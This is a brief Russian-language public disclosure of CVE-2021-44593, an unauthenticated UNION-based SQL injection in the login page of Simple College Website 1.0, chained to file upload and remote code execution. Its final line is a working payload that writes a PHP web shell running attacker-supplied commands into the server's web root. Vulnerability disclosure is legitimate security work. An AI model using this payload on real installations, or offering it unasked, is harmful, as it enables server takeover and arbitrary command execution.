
Публичное раскрытие и разбор CVE-2021-44593 — неаутентифицированная SQL-инъекция в Simple College Website, приводящая к произвольной загрузке файлов и удалённому выполнению кода.
Публичное раскрытие CVE-2021-44593. Уязвимость SQL-инъекции/произвольной загрузки файлов/удалённого выполнения кода в Simple College Website.
Simple College Website 1.0 уязвим к неаутентифицированной SQL-инъекции на основе UNION в параметре "username" страницы /admin/login.php, которую затем можно использовать для загрузки произвольных файлов и получения удалённого выполнения кода.
Функция login() в admin_class.php
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -